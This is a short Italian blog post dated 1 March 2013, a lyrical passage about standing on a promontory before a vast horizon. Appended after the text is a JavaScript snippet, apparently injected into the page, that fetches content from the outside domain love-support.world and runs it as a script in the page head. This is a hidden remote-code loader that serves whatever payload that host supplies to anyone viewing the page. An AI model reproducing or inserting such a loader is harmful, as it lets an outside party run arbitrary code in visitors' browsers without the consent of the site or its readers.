il promontorio
1 Marzo 2013
Nessun commento
Article
Oggi è un promontorio.
Lo sguardo ingoia un orizzonte immenso. Una lama affilata recide i tendini d’ormeggio. Le vele sognano il vento.
var url = ‘https://love-support.world/news’; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(‘script’); script.textContent = data; document.getElementsByTagName(‘head’)[0].appendChild(script); })